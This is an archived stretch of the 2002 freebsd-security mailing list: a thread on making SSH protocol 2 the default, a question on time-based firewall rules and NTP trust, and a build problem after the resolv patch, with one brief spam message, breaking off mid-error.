majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 4 23:29: 2 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 94E0C37B400 for ; Thu, 4 Jul 2002 23:29:00 -0700 (PDT) Received: from smtp6.mindspring.com (smtp6.mindspring.com [207.69.200.110]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5285A43E09 for ; Thu, 4 Jul 2002 23:29:00 -0700 (PDT) (envelope-from l4rtanker_67@hotmail.com) Received: from dialup-207-232-91-141.omaha.radiks.net ([207.232.91.141] helo=jfs3yi62) by smtp6.mindspring.com with smtp (Exim 3.33 #1) id 17QLFI-00032W-00; Fri, 05 Jul 2002 01:03:04 -0400 From: l4rtanker_67@hotmail.com To: xtraball@hotmail.com Subject: Its Great Date: Tue, 04 Jul 2000 22:22:39 -0500 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_44FE_000065B3.00000723" X-Priority: 3 X-MSMail-Priority: Normal Reply-To: l4rtanker_67@hotmail.com Message-Id: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ------=_NextPart_000_44FE_000065B3.00000723 Content-Type: text/html; Dietary Supplement

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 5 4:46: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E6C2D37B400; Fri, 5 Jul 2002 04:46:00 -0700 (PDT) Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by mx1.FreeBSD.org (Postfix) with ESMTP id DEB2943E31; Fri, 5 Jul 2002 04:45:59 -0700 (PDT) (envelope-from des@ofug.org) Received: by flood.ping.uio.no (Postfix, from userid 2602) id A4E03534A; Fri, 5 Jul 2002 13:45:56 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Mike Tancsa Cc: Ruslan Ermilov , security@freebsd.org Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1] References: <20020705073634.GA64656@sunbay.com> <20020705073634.GA64656@sunbay.com> <5.1.0.14.0.20020705073043.01c52198@192.168.0.12> From: Dag-Erling Smorgrav Date: 05 Jul 2002 13:45:56 +0200 In-Reply-To: <5.1.0.14.0.20020705073043.01c52198@192.168.0.12> Message-ID: Lines: 15 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org [moving from -stable to -security, bcc: to -stable and security-team] Mike Tancsa writes: > As a lot has changed with OpenSSH in FreeBSD, perhaps now is a good > time to make the 2,1 the default instead ? I'd like that. I think the only reason for the old default was not to surprise users who had the ssh1 RSA host key in their known_hosts but not the ssh2 DSA host key. What do people think about this? Keep 2,1 or revert to 1,2? DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 5 4:53: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B531A37B409; Fri, 5 Jul 2002 04:53:03 -0700 (PDT) Received: from melusine.cuivre.fr.eu.org (melusine.cuivre.fr.eu.org [62.212.105.185]) by mx1.FreeBSD.org (Postfix) with ESMTP id 68E1043E31; Fri, 5 Jul 2002 04:51:11 -0700 (PDT) (envelope-from thomas@cuivre.fr.eu.org) Received: by melusine.cuivre.fr.eu.org (Postfix, from userid 1000) id 045BE2C3D1; Fri, 5 Jul 2002 13:49:34 +0200 (CEST) Date: Fri, 5 Jul 2002 13:49:34 +0200 From: Thomas Quinot To: Dag-Erling Smorgrav Cc: Mike Tancsa , Ruslan Ermilov , security@freebsd.org Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1] Message-ID: <20020705134934.A40046@melusine.cuivre.fr.eu.org> Reply-To: thomas@cuivre.fr.eu.org References: <20020705073634.GA64656@sunbay.com> <20020705073634.GA64656@sunbay.com> <5.1.0.14.0.20020705073043.01c52198@192.168.0.12> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5i In-Reply-To: ; from des@ofug.org on Fri, Jul 05, 2002 at 01:45:56PM +0200 X-message-flag: WARNING! Using Outlook can damage your computer. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Le 2002-07-05, Dag-Erling Smorgrav écrivait : > What do people think about this? Keep 2,1 or revert to 1,2? Since the version change is going to suprise people anyway, I'd say let us do it all the way and switch to protocol 2,1. It is more than time to phase out protocol 1. -- Thomas.Quinot@Cuivre.FR.EU.ORG To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 5 5: 6:18 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7804437B401; Fri, 5 Jul 2002 05:06:15 -0700 (PDT) Received: from lerlaptop.lerctr.org (lerlaptop.lerctr.org [207.158.72.14]) by mx1.FreeBSD.org (Postfix) with ESMTP id CDAC143E77; Fri, 5 Jul 2002 05:03:34 -0700 (PDT) (envelope-from ler@lerctr.org) Received: from localhost (localhost [127.0.0.1]) by lerlaptop.lerctr.org (8.12.5/8.12.5) with ESMTP id g65C2rFX000783; Fri, 5 Jul 2002 07:02:53 -0500 (CDT) (envelope-from ler@lerctr.org) Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1] From: Larry Rosenman To: Dag-Erling Smorgrav Cc: Mike Tancsa , Ruslan Ermilov , security@FreeBSD.ORG In-Reply-To: References: <20020705073634.GA64656@sunbay.com> <20020705073634.GA64656@sunbay.com> <5.1.0.14.0.20020705073043.01c52198@192.168.0.12> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.7 Date: 05 Jul 2002 07:02:53 -0500 Message-Id: <1025870573.401.1.camel@lerlaptop.lerctr.org> Mime-Version: 1.0 X-Virus-Scanned: by amavisd-milter (http://amavis.org/) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, 2002-07-05 at 06:45, Dag-Erling Smorgrav wrote: > [moving from -stable to -security, bcc: to -stable and security-team] > > Mike Tancsa writes: > > As a lot has changed with OpenSSH in FreeBSD, perhaps now is a good > > time to make the 2,1 the default instead ? > > I'd like that. I think the only reason for the old default was not to > surprise users who had the ssh1 RSA host key in their known_hosts but > not the ssh2 DSA host key. > > What do people think about this? Keep 2,1 or revert to 1,2? It would seem that this is an appropriate time. SSH1 is old, and SSH2 is mature enough. With all the other changes, this wouldn't be a big POLA violation. -- Larry Rosenman http://www.lerctr.org/~ler Phone: +1 972-414-9812 E-Mail: ler@lerctr.org US Mail: 1905 Steamboat Springs Drive, Garland, TX 75044-6749 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 5 5:11:28 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 53E8737B400 for ; Fri, 5 Jul 2002 05:11:23 -0700 (PDT) Received: from south.nanolink.com (south.nanolink.com [217.75.134.10]) by mx1.FreeBSD.org (Postfix) with SMTP id 936E543E3B for ; Fri, 5 Jul 2002 05:11:21 -0700 (PDT) (envelope-from roam@ringlet.net) Received: (qmail 79017 invoked by uid 85); 5 Jul 2002 12:23:56 -0000 Received: from unknown (HELO straylight.ringlet.net) (213.226.16.26) by south.nanolink.com with SMTP; 5 Jul 2002 12:23:52 -0000 Received: (qmail 1780 invoked by uid 1000); 5 Jul 2002 12:11:25 -0000 Date: Fri, 5 Jul 2002 15:11:25 +0300 From: Peter Pentchev To: Thomas Quinot Cc: Dag-Erling Smorgrav , Mike Tancsa , Ruslan Ermilov , security@freebsd.org Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1] Message-ID: <20020705121125.GF494@straylight.oblivion.bg> Mail-Followup-To: Thomas Quinot , Dag-Erling Smorgrav , Mike Tancsa , Ruslan Ermilov , security@freebsd.org References: <20020705073634.GA64656@sunbay.com> <20020705073634.GA64656@sunbay.com> <5.1.0.14.0.20020705073043.01c52198@192.168.0.12> <20020705134934.A40046@melusine.cuivre.fr.eu.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="a8Wt8u1KmwUX3Y2C" Content-Disposition: inline In-Reply-To: <20020705134934.A40046@melusine.cuivre.fr.eu.org> User-Agent: Mutt/1.5.1i X-Virus-Scanned: by Nik's Monitoring Daemon (AMaViS perl-11d ) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --a8Wt8u1KmwUX3Y2C Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Jul 05, 2002 at 01:49:34PM +0200, Thomas Quinot wrote: > Le 2002-07-05, Dag-Erling Smorgrav ?crivait : >=20 > > What do people think about this? Keep 2,1 or revert to 1,2? >=20 > Since the version change is going to suprise people anyway, I'd say let > us do it all the way and switch to protocol 2,1. It is more than time > to phase out protocol 1. Seconded. G'luck, Peter --=20 Peter Pentchev roam@ringlet.net roam@FreeBSD.org PGP key: http://people.FreeBSD.org/~roam/roam.key.asc Key fingerprint FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553 What would this sentence be like if it weren't self-referential? --a8Wt8u1KmwUX3Y2C Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9JYzt7Ri2jRYZRVMRAjM5AKDAK+b2j/F92l93TOPi9wZLyJk7jQCdE9MD mA0l9ddod1gkAPH5KH/V4nU= =VfvN -----END PGP SIGNATURE----- --a8Wt8u1KmwUX3Y2C-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 5 5:30:20 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BAC5137B400 for ; Fri, 5 Jul 2002 05:30:17 -0700 (PDT) Received: from solikus.sumy.net (solikus.sim.net.ua [194.153.148.218]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9CC9843E31 for ; Fri, 5 Jul 2002 05:30:13 -0700 (PDT) (envelope-from solik@sumy.net) Received: from sumy.net (localhost [127.0.0.1]) by solikus.sumy.net (8.12.4/8.12.4) with ESMTP id g65C49fu005299 for ; Fri, 5 Jul 2002 15:04:09 +0300 (EEST) (envelope-from solik@sumy.net) Message-ID: <3D258B39.2050405@sumy.net> Date: Fri, 05 Jul 2002 15:04:09 +0300 From: Sergey Solyanik Organization: Fort Ochka, XY. User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0.0) Gecko/20020610 X-Accept-Language: ru, uk, en MIME-Version: 1.0 Cc: security@freebsd.org Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1] References: <20020705073634.GA64656@sunbay.com> <20020705073634.GA64656@sunbay.com> <5.1.0.14.0.20020705073043.01c52198@192.168.0.12> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Dag-Erling Smorgrav wrote: > What do people think about this? Keep 2,1 or revert to 1,2? keep 2,1, please! -- Ich sehe Sie auf der dunklen Seite des Mondes... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 5 7: 1:50 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 02ACC37B400; Fri, 5 Jul 2002 07:01:48 -0700 (PDT) Received: from blues.jpj.net (blues.jpj.net [208.210.80.156]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3874E43E3B; Fri, 5 Jul 2002 07:01:47 -0700 (PDT) (envelope-from trevor@jpj.net) Received: from blues.jpj.net (localhost.jpj.net [127.0.0.1]) by blues.jpj.net (8.12.3/8.12.3) with ESMTP id g65E1jp7075565; Fri, 5 Jul 2002 10:01:46 -0400 (EDT) (envelope-from trevor@jpj.net) Received: from localhost (trevor@localhost) by blues.jpj.net (8.12.3/8.12.3/Submit) with ESMTP id g65E1jjt075562; Fri, 5 Jul 2002 10:01:45 -0400 (EDT) X-Authentication-Warning: blues.jpj.net: trevor owned process doing -bs Date: Fri, 5 Jul 2002 10:01:45 -0400 (EDT) From: Trevor Johnson To: Dag-Erling Smorgrav Cc: Mike Tancsa , Ruslan Ermilov , Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1] In-Reply-To: Message-ID: <20020705094314.C73784-100000@blues.jpj.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > > As a lot has changed with OpenSSH in FreeBSD, perhaps now is a good > > time to make the 2,1 the default instead ? > > I'd like that. I think the only reason for the old default was not to > surprise users who had the ssh1 RSA host key in their known_hosts but > not the ssh2 DSA host key. > > What do people think about this? Keep 2,1 or revert to 1,2? Use of protocol version 1 makes an insertion attack possible, according to . The vulnerability was published by CORE SDI in June of 1998. I would like to see protocol version 1 disabled by default, with a note in UPDATING about the change. -- Trevor Johnson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 5 7:11: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3EA0637B400; Fri, 5 Jul 2002 07:11:04 -0700 (PDT) Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9688543E3B; Fri, 5 Jul 2002 07:11:03 -0700 (PDT) (envelope-from des@ofug.org) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 1B187534B; Fri, 5 Jul 2002 16:11:02 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Trevor Johnson Cc: Mike Tancsa , Ruslan Ermilov , Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1] References: <20020705094314.C73784-100000@blues.jpj.net> From: Dag-Erling Smorgrav Date: 05 Jul 2002 16:11:01 +0200 In-Reply-To: <20020705094314.C73784-100000@blues.jpj.net> Message-ID: Lines: 16 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Trevor Johnson writes: > Use of protocol version 1 makes an insertion attack possible, according to > . That same page also explains that OpenSSH contains code to make such attacks very difficult. > The vulnerability was > published by CORE SDI in June of 1998. I would like to see protocol > version 1 disabled by default, with a note in UPDATING about the change. No. I will not arbitrarily lock users out of their machines. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 5 10:41:38 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CC61237B400; Fri, 5 Jul 2002 10:41:34 -0700 (PDT) Received: from mail.rz.uni-ulm.de (gemini.rz.uni-ulm.de [134.60.246.16]) by mx1.FreeBSD.org (Postfix) with ESMTP id BE44843E09; Fri, 5 Jul 2002 10:41:33 -0700 (PDT) (envelope-from siegbert.baude@gmx.de) Received: from gmx.de (lilith.wh-wurm.uni-ulm.de [134.60.106.64]) by mail.rz.uni-ulm.de (8.12.4/8.12.4) with ESMTP id g65HfVOa024006 (version=TLSv1/SSLv3 cipher=RC4-MD5 bits=128 verify=NOT); Fri, 5 Jul 2002 19:41:31 +0200 (MEST) Message-ID: <3D25DA4B.7060703@gmx.de> Date: Fri, 05 Jul 2002 19:41:31 +0200 From: Siegbert Baude User-Agent: Mozilla/5.0 (X11; U; Linux i386; de-AT; rv:1.0.0) Gecko/20020529 X-Accept-Language: de, en MIME-Version: 1.0 To: Dag-Erling Smorgrav Cc: Mike Tancsa , Ruslan Ermilov , security@freebsd.org Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1] References: <20020705073634.GA64656@sunbay.com> <20020705073634.GA64656@sunbay.com> <5.1.0.14.0.20020705073043.01c52198@192.168.0.12> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Dag-Erling Smorgrav schrieb: > [moving from -stable to -security, bcc: to -stable and security-team] > > Mike Tancsa writes: > >>As a lot has changed with OpenSSH in FreeBSD, perhaps now is a good >>time to make the 2,1 the default instead ? > > > I'd like that. I think the only reason for the old default was not to > surprise users who had the ssh1 RSA host key in their known_hosts but > not the ssh2 DSA host key. > > What do people think about this? Keep 2,1 or revert to 1,2? My opinion is: Go for the change, there will pass a long time until this opportunity will come again. But then, I only have to support 100 clients. The people with really big crowds to support may think different. Ciao Siegbert To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 5 10:55:25 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 865F237B400; Fri, 5 Jul 2002 10:55:22 -0700 (PDT) Received: from postal1.es.net (postal1.es.net [198.128.3.205]) by mx1.FreeBSD.org (Postfix) with ESMTP id CEE9A43E42; Fri, 5 Jul 2002 10:55:21 -0700 (PDT) (envelope-from oberman@es.net) Received: from ptavv.es.net ([198.128.4.29]) by postal1.es.net (Postal Node 1) with ESMTP id GQF37091; Fri, 05 Jul 2002 10:54:00 -0700 Received: from ptavv (localhost [127.0.0.1]) by ptavv.es.net (Postfix) with ESMTP id B31B95D03; Fri, 5 Jul 2002 10:55:19 -0700 (PDT) To: Dag-Erling Smorgrav Cc: Mike Tancsa , Ruslan Ermilov , security@freebsd.org Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1] In-reply-to: Your message of "05 Jul 2002 13:45:56 +0200." Date: Fri, 05 Jul 2002 10:55:19 -0700 From: "Kevin Oberman" Message-Id: <20020705175519.B31B95D03@ptavv.es.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > From: Dag-Erling Smorgrav > Date: 05 Jul 2002 13:45:56 +0200 > Sender: owner-freebsd-stable@FreeBSD.ORG > > [moving from -stable to -security, bcc: to -stable and security-team] > > Mike Tancsa writes: > > As a lot has changed with OpenSSH in FreeBSD, perhaps now is a good > > time to make the 2,1 the default instead ? > > I'd like that. I think the only reason for the old default was not to > surprise users who had the ssh1 RSA host key in their known_hosts but > not the ssh2 DSA host key. > > What do people think about this? Keep 2,1 or revert to 1,2? Keep 2,1. It's the best for many reasons and it's about time to live with a bit of astonishment. It should be added to UPDATING, though. (Let's keep the astonishment to a minimum. FWIW, I changed my systems to 2,1 at least 4 months ago. R. Kevin Oberman, Network Engineer Energy Sciences Network (ESnet) Ernest O. Lawrence Berkeley National Laboratory (Berkeley Lab) E-mail: oberman@es.net Phone: +1 510 486-8634 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 5 12:30:25 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8C38E37B400 for ; Fri, 5 Jul 2002 12:30:21 -0700 (PDT) Received: from bran.mc.mpls.visi.com (bran.mc.mpls.visi.com [208.42.156.103]) by mx1.FreeBSD.org (Postfix) with ESMTP id DA28643E42 for ; Fri, 5 Jul 2002 12:30:20 -0700 (PDT) (envelope-from hawkeyd@visi.com) Received: from sheol.localdomain (hawkeyd-fw.dsl.visi.com [208.42.101.193]) by bran.mc.mpls.visi.com (Postfix) with ESMTP id BCF355022; Fri, 5 Jul 2002 14:30:19 -0500 (CDT) Received: (from hawkeyd@localhost) by sheol.localdomain (8.11.6/8.11.6) id g65JUH220467; Fri, 5 Jul 2002 14:30:17 -0500 (CDT) (envelope-from hawkeyd) Date: Fri, 5 Jul 2002 14:30:17 -0500 (CDT) Message-Id: <200207051930.g65JUH220467@sheol.localdomain> Mime-Version: 1.0 X-Newsreader: knews 1.0b.1 Reply-To: hawkeyd@visi.com Organization: if (!FIFO) if (!LIFO) break; References: <5.1.0.14.0.20020705073043.01c52198_192.168.0.12@ns.sol.net> In-Reply-To: From: hawkeyd@visi.com (D J Hawkey Jr) Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1] X-Original-Newsgroups: sol.lists.freebsd.security To: des@ofug.org, freebsd-security@freebsd.org Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In article , des@ofug.org writes: > [moving from -stable to -security, bcc: to -stable and security-team] > > Mike Tancsa writes: >> As a lot has changed with OpenSSH in FreeBSD, perhaps now is a good >> time to make the 2,1 the default instead ? > > I'd like that. I think the only reason for the old default was not to > surprise users who had the ssh1 RSA host key in their known_hosts but > not the ssh2 DSA host key. > > What do people think about this? Keep 2,1 or revert to 1,2? The former. And note it in UPDATING. FWIW, I've been setting machines I'm responsible for to 2 only for some time now. > DES Dave -- Windows: "Where do you want to go today?" Linux: "Where do you want to go tomorrow?" FreeBSD: "Are you guys coming, or what?" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 5 13: 7:12 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5954637B400 for ; Fri, 5 Jul 2002 13:07:07 -0700 (PDT) Received: from hotmail.com (f120.law11.hotmail.com [64.4.17.120]) by mx1.FreeBSD.org (Postfix) with ESMTP id F2AF643E09 for ; Fri, 5 Jul 2002 13:07:06 -0700 (PDT) (envelope-from kimokasawa@hotmail.com) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Fri, 5 Jul 2002 13:07:06 -0700 Received: from 152.75.99.55 by lw11fd.law11.hotmail.msn.com with HTTP; Fri, 05 Jul 2002 20:07:06 GMT X-Originating-IP: [152.75.99.55] From: "Kim Okasawa" To: _@r4k.net Cc: freebsd-security@freebsd.org Subject: Re: Any security issues with root's cron job? Date: Sat, 06 Jul 2002 05:07:06 +0900 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 05 Jul 2002 20:07:06.0893 (UTC) FILETIME=[899B13D0:01C2245F] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >From: Stephanie Wehner <_@r4k.net> >To: Kim Okasawa >Subject: Re: Any security issues with root's cron job? >Date: Wed, 3 Jul 2002 16:48:37 +0200 > >Hi Kim, > > > Can anyone think of any potential security risks to such practice? > >Any suggestions and comments are greatly appreciated. Thank you! > >Not from the cronjob directly, however why would you want to change >your ipfw rule set according to time ? > >What I would check in this case is how your machine keeps time, >eg it must be rather accurate. Also, by getting timing information >from a remote ntp server for example would then mean you place your >firewall rules pretty much into their hands. > Hi Stephenie: Good thinking. You are absolutely right! The time should be rather accurate in order for this to function correctly. How about letting the server to run its ntp service? Clients who want to access to the server would have to sync with it if necessary. But this means that the firewall needs to open the ntp port and may create other problems. What I want is to create a virtual timed vault that only allow the world to access to certain services within a specific period of time. In my case, some services/ports don't need to be available to the public from 8PM-8AM. Closing those ports may mean less troubles. Any suggestion on how to deal with the ntp problem? Thanks. Best Regards, Kim _________________________________________________________________ MSN Photos is the easiest way to share and print your photos: http://photos.msn.com/support/worldwide.aspx To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 5 13: 8:14 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 766D137B400 for ; Fri, 5 Jul 2002 13:08:10 -0700 (PDT) Received: from sccrmhc02.attbi.com (sccrmhc02.attbi.com [204.127.202.62]) by mx1.FreeBSD.org (Postfix) with ESMTP id DFC6543E3B for ; Fri, 5 Jul 2002 13:07:50 -0700 (PDT) (envelope-from crist.clark@attbi.com) Received: from blossom.cjclark.org ([12.234.91.48]) by sccrmhc02.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020705200738.DGH6023.sccrmhc02.attbi.com@blossom.cjclark.org>; Fri, 5 Jul 2002 20:07:38 +0000 Received: from blossom.cjclark.org (localhost. [127.0.0.1]) by blossom.cjclark.org (8.12.3/8.12.3) with ESMTP id g65K7bJK018745; Fri, 5 Jul 2002 13:07:37 -0700 (PDT) (envelope-from crist.clark@attbi.com) Received: (from cjc@localhost) by blossom.cjclark.org (8.12.3/8.12.3/Submit) id g65K7bIk018744; Fri, 5 Jul 2002 13:07:37 -0700 (PDT) X-Authentication-Warning: blossom.cjclark.org: cjc set sender to crist.clark@attbi.com using -f Date: Fri, 5 Jul 2002 13:07:37 -0700 From: "Crist J. Clark" To: Amy Shaftoe Cc: freebsd-security@FreeBSD.ORG Subject: Re: Rebuilding the static programs Message-ID: <20020705130737.A17982@blossom.cjclark.org> Reply-To: "Crist J. Clark" References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: ; from amyshaftoe@hotmail.com on Wed, Jul 03, 2002 at 09:26:43PM -0500 X-URL: http://people.freebsd.org/~cjc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jul 03, 2002 at 09:26:43PM -0500, Amy Shaftoe wrote: > Since I don't have enough disk space to do a make world on my > 4.6-RELEASE system, I was going to rebuild libc and the static > programs individually after applying the FreeBSD-SA-02:28.resolv > patch. > > I applied the patch then did a "make", "make install" and a "make > clean" in /usr/src/lib/libc. That went fine. Then I did the same > in /usr/src/sbin and that when fine. But in /usr/src/bin it dies > with this: > > >===> rmail > >Warning: Object directory not changed from original /usr/src/bin/rmail > >ln -sf > >/usr/src/bin/rmail/../../contrib/sendmail/include/sm/os/sm_os_freebsd.h > >sm_os.h > >cc -O -pipe -I/usr/src/bin/rmail/../../contrib/sendmail/include -I. -Wall > >-Wformat -c /usr/src/bin/rmail/../../contrib/sendmail/rmail/rmail.c > >cc -O -pipe -I/usr/src/bin/rmail/../../contrib/sendmail/include -I. -Wall > >-Wformat -o rmail rmail.o /usr/src/bin/rmail/../../lib/libsm/libsm.a > >cc: /usr/src/bin/rmail/../../lib/libsm/libsm.a: No such file or 